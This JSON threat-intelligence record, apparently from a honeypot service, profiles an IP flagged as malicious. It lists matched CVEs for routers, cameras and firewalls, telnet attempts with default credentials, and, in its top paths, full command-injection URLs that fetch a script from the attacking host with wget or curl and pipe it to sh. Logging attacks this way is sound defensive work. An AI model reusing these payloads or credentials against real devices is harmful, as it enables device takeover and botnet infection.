{"ip":"158.94.211.199","total_events":83,"verdict":{"verdict":"malicious","label":"Exploit attempts observed","detail":"8 exploit-path hits","confidence":"high","network_type":null,"why":["8 request(s) matched a known exploit path.","Body-carrying methods (POST/PUT/PATCH/DELETE) seen: payload delivery, not just recon.","5+ hits raise confidence to high.","Not in any known-scanner range.","Sent 9,238 bytes: sustained payload delivery, not a single opportunistic request."],"engagement":{"level":"payload","label":"Sustained payload","detail":"9,238 bytes sent","bytes_sent":9238,"session_seconds":1,"persistent":false}},"first_seen":"2026-09-20T15:37:22","last_seen":"2026-09-21T06:18:52","events_24h":83,"events_7d":83,"geo":{"country_code":"NL","country_name":"The Netherlands","region":"South Holland","city":"Rotterdam","lat":51.9179,"lon":4.4901,"asn":202412,"org":"Omegatech LTD"},"source_domain":null,"known_scanners":[],"scanner_tag":null,"cve_matches":[{"cve_id":"CVE-2020-10987","title":"Tenda AC15 AC1900 version 15.03.05.19 - Command Injection","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/goform/setUsbUnload"},{"cve_id":"CVE-2021-36260","title":"Hikvision IP camera/NVR - Remote Command Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/SDK/webLanguage"},{"cve_id":"CVE-2022-30525","title":"Zyxel Firewall - OS Command Injection","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/ztp/cgi-bin/handler"},{"cve_id":"CVE-2023-1389","title":"TP-Link Archer AX21 (AX1800) - Unauthenticated Command Injection","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/cgi-bin/luci/;stok=/locale?form=country"},{"cve_id":"CVE-2023-42793","title":"JetBrains TeamCity < 2023.05.4 - Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/app/rest/users/id:1/tokens/RPC2"},{"cve_id":"CVE-2020-25078","title":"D-Link DCS-2530L/DCS-2670L - Administrator Password Disclosure","severity":"high","actively_exploited":true,"match_field":"url_path","matched_pattern":"/config/getuser"},{"cve_id":"CVE-2024-24919","title":"Check Point Quantum Gateway - Information Disclosure","severity":"high","actively_exploited":true,"match_field":"url_path","matched_pattern":"/clients/MyCRL"},{"cve_id":"CVE-2023-36844","title":"Juniper Devices - Remote Code Execution","severity":"medium","actively_exploited":true,"match_field":"url_path","matched_pattern":"/webauth_operation.php"}],"malware":[],"top_ports":[{"port":2323,"proto":"tcp","label":"","count":30},{"port":23,"proto":"tcp","label":"Telnet","count":30},{"port":443,"proto":"tcp","label":"HTTPS","count":23}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_ja3":[],"ja4h":["ge11nn0400_17292dadbc7b","po11nn0400_17292dadbc7b","po11nr0600_68cc7223b41e","po11nn0600_f7064d3db7b2"]},"fingerprint_peers":{"ge11nn0400_17292dadbc7b":1619,"po11nn0400_17292dadbc7b":1,"po11nr0600_68cc7223b41e":1,"po11nn0600_f7064d3db7b2":1},"user_agents":["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"],"timeline":[{"date":"2026-09-20","count":23},{"date":"2026-09-21","count":60}],"recent_events":[{"timestamp":"2026-09-21T06:18:52","port":2323,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"support\r\n","payload_hex":"737570706f72740d0a","method":"","user_agent":"","ja3":"","session":"c476467e-70d2-4347-90d6-dedeb8faa689","seq":2,"duration_ms":256,"bytes_in":18,"bytes_out":31,"enriched":{"digest":"30254dc4712488ee","strings":["support"]}},{"timestamp":"2026-09-21T06:18:52","port":2323,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"support\r\n","payload_hex":"737570706f72740d0a","method":"","user_agent":"","ja3":"","session":"c476467e-70d2-4347-90d6-dedeb8faa689","seq":1,"duration_ms":100,"bytes_in":9,"bytes_out":12,"enriched":{"digest":"30254dc4712488ee","strings":["support"]}},{"timestamp":"2026-09-21T06:18:50","port":2323,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"\r\n","payload_hex":"0d0a","method":"","user_agent":"","ja3":"","session":"580ef566-b988-428d-9d07-20c63deacd11","seq":2,"duration_ms":257,"bytes_in":9,"bytes_out":22},{"timestamp":"2026-09-21T06:18:50","port":2323,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"admin\r\n","payload_hex":"61646d696e0d0a","method":"","user_agent":"","ja3":"","session":"580ef566-b988-428d-9d07-20c63deacd11","seq":1,"duration_ms":100,"bytes_in":7,"bytes_out":12,"enriched":{"digest":"86ff11bd7933c00a","strings":["admin"]}},{"timestamp":"2026-09-21T06:18:49","port":2323,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"123456\r\n","payload_hex":"3132333435360d0a","method":"","user_agent":"","ja3":"","session":"e613fb75-4ff3-424b-b3bd-87a17dfde4d5","seq":2,"duration_ms":259,"bytes_in":15,"bytes_out":31,"enriched":{"digest":"685414bd2b15a3a5","strings":["123456"]}},{"timestamp":"2026-09-21T06:18:49","port":2323,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"admin\r\n","payload_hex":"61646d696e0d0a","method":"","user_agent":"","ja3":"","session":"e613fb75-4ff3-424b-b3bd-87a17dfde4d5","seq":1,"duration_ms":100,"bytes_in":7,"bytes_out":12,"enriched":{"digest":"86ff11bd7933c00a","strings":["admin"]}},{"timestamp":"2026-09-21T06:18:47","port":2323,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"admin\r\n","payload_hex":"61646d696e0d0a","method":"","user_agent":"","ja3":"","session":"cd2d2f57-a63c-4db8-a99c-059551f622b2","seq":2,"duration_ms":351,"bytes_in":14,"bytes_out":31,"enriched":{"digest":"86ff11bd7933c00a","strings":["admin"]}},{"timestamp":"2026-09-21T06:18:47","port":2323,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"admin\r\n","payload_hex":"61646d696e0d0a","method":"","user_agent":"","ja3":"","session":"cd2d2f57-a63c-4db8-a99c-059551f622b2","seq":1,"duration_ms":100,"bytes_in":7,"bytes_out":12,"enriched":{"digest":"86ff11bd7933c00a","strings":["admin"]}},{"timestamp":"2026-09-21T06:18:46","port":2323,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"hi3518\r\n","payload_hex":"6869333531380d0a","method":"","user_agent":"","ja3":"","session":"43a76e94-8f0a-41f0-829b-601c529e7f5e","seq":2,"duration_ms":425,"bytes_in":14,"bytes_out":31,"enriched":{"digest":"0ba283e707c0ff5d","strings":["hi3518"]}},{"timestamp":"2026-09-21T06:18:45","port":2323,"proto":"tcp","app_proto":"","app_protocol":"","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"root\r\n","payload_hex":"726f6f740d0a","method":"","user_agent":"","ja3":"","session":"43a76e94-8f0a-41f0-829b-601c529e7f5e","seq":1,"duration_ms":100,"bytes_in":6,"bytes_out":12,"enriched":{"digest":"7a3e133eff695456","strings":["root"]}}],"http_methods":[{"method":"GET","count":11},{"method":"POST","count":11},{"method":"PUT","count":1}],"distinct_ports_total":3,"top_paths":[{"path":"/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=US;%28wget%20-qO-%20http%3A//158.94.211.199%3A9999/30e97bc1260e%7Csh%7C%7Ccurl%20-s%20http%3A//158.94.211.199%3A9999/30e97bc1260e%7Csh%29","count":2,"ports":1},{"path":"/Autorun/","count":1,"ports":1},{"path":"/clients/MyCRL","count":1,"ports":1},{"path":"/ztp/cgi-bin/handler","count":1,"ports":1},{"path":"/ctrlt/DeviceUpgrade_1","count":1,"ports":1},{"path":"/config/getuser?index=0","count":1,"ports":1},{"path":"/webauth_operation.php","count":1,"ports":1},{"path":"/remote/hostcheck_validate","count":1,"ports":1},{"path":"/cgi-bin/ping.cgi?ping_ip=127.0.0.1;%28wget%20-qO-%20http%3A//158.94.211.199%3A9999/30e97bc1260e%7Csh%7C%7Ccurl%20-s%20http%3A//158.94.211.199%3A9999/30e97bc1260e%7Csh%29","count":1,"ports":1},{"path":"/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection","count":1,"ports":1},{"path":"/goform/setUsbUnload?deviceName=usb1;%28wget%20-qO-%20http%3A//158.94.211.199%3A9999/30e97bc1260e%7Csh%7C%7Ccurl%20-s%20http%3A//158.94.211.199%3A9999/30e97bc1260e%7Csh%29","count":1,"ports":1},{"path":"/./6fy4g5pqgx3zpmepcig05bjqggvjbe8m.session","count":1,"ports":1},{"path":"/app/rest/users/id:1/tokens/RPC2","count":1,"ports":1},{"path":"/cgi-bin/boaform.cgi?cmd=ping&ping_ip=127.0.0.1;%28wget%20-qO-%20http%3A//158.94.211.199%3A9999/30e97bc1260e%7Csh%7C%7Ccurl%20-s%20http%3A//158.94.211.199%3A9999/30e97bc1260e%7Csh%29","count":1,"ports":1},{"path":"/ping.cgi?pingIpAddress=127.0.0.1;%28wget%20-qO-%20http%3A//158.94.211.199%3A9999/30e97bc1260e%7Csh%7C%7Ccurl%20-s%20http%3A//158.94.211.199%3A9999/30e97bc1260e%7Csh%29","count":1,"ports":1}],"distinct_paths_total":22,"top_snis":[],"top_hosts":[],"top_alpns":[],"banners":[],"credentials":[],"header_profile":null,"tags":[{"tag_id":"CVE-2020-10987","tag_type":"cve","title":"Tenda AC15 AC1900 version 15.03.05.19 - Command Injection","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/goform/setUsbUnload","reference_urls":["https://blog.securityevaluators.com/tenda-ac1900-vulnerabilities-discovered-and-exploited-e8e26aa0bc68"]},{"tag_id":"CVE-2021-36260","tag_type":"cve","title":"Hikvision IP camera/NVR - Remote Command Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/SDK/webLanguage","reference_urls":["https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html","https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/","https://nvd.nist.gov/vuln/detail/CVE-2021-36260","https://github.com/Aiminsun/CVE-2021-36260","https://therecord.media/experts-warn-of-widespread-exploitation-involving-hikvision-cameras/"]},{"tag_id":"CVE-2022-30525","tag_type":"cve","title":"Zyxel Firewall - OS Command Injection","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/ztp/cgi-bin/handler","reference_urls":["https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/","https://github.com/rapid7/metasploit-framework/pull/16563","https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml","https://nvd.nist.gov/vuln/detail/CVE-2022-30525","http://packetstormsecurity.com/files/167176/Zyxel-Remote-Command-Execution.html"]},{"tag_id":"CVE-2023-1389","tag_type":"cve","title":"TP-Link Archer AX21 (AX1800) - Unauthenticated Command Injection","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/cgi-bin/luci/;stok=/locale?form=country","reference_urls":["https://www.tenable.com/security/research/tra-2023-11","https://nvd.nist.gov/vuln/detail/CVE-2023-1389","https://github.com/tenable/poc-cve-2023-1389"]},{"tag_id":"CVE-2023-42793","tag_type":"cve","title":"JetBrains TeamCity < 2023.05.4 - Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/app/rest/users/id:1/tokens/RPC2","reference_urls":["https://www.jetbrains.com/privacy-security/issues-fixed/","https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis","https://www.sonarsource.com/blog/teamcity-vulnerability","https://nvd.nist.gov/vuln/detail/CVE-2023-42793","https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793"]},{"tag_id":"CVE-2020-25078","tag_type":"cve","title":"D-Link DCS-2530L/DCS-2670L - Administrator Password Disclosure","severity":"high","actively_exploited":true,"match_field":"url_path","matched_pattern":"/config/getuser","reference_urls":["https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10180","https://twitter.com/Dogonsecurity/status/1273251236167516161","https://nvd.nist.gov/vuln/detail/CVE-2020-25078","https://github.com/pen4uin/vulnerability-research-list","https://github.com/ArrestX/--POC"]},{"tag_id":"CVE-2024-24919","tag_type":"cve","title":"Check Point Quantum Gateway - Information Disclosure","severity":"high","actively_exploited":true,"match_field":"url_path","matched_pattern":"/clients/MyCRL","reference_urls":["https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/","https://support.checkpoint.com/results/sk/sk182337","https://s4e.io/tools/check-point-quantum-gateway-information-disclosure-cve-2024-24919","https://thehackernews.com/2024/05/check-point-warns-of-zero-day-attacks.html","https://censys.com/cve-2024-24919/"]},{"tag_id":"CVE-2023-36844","tag_type":"cve","title":"Juniper Devices - Remote Code Execution","severity":"medium","actively_exploited":true,"match_field":"url_path","matched_pattern":"/webauth_operation.php","reference_urls":["https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/","https://github.com/watchtowrlabs/juniper-rce_cve-2023-36844","https://supportportal.juniper.net/JSA72300","http://packetstormsecurity.com/files/174397/Juniper-JunOS-SRX-EX-Remote-Code-Execution.html","http://packetstormsecurity.com/files/174865/Juniper-SRX-Firewall-EX-Switch-Remote-Code-Execution.html"]}],"data_as_of":"2026-09-21T07:30:15.799609+00:00"}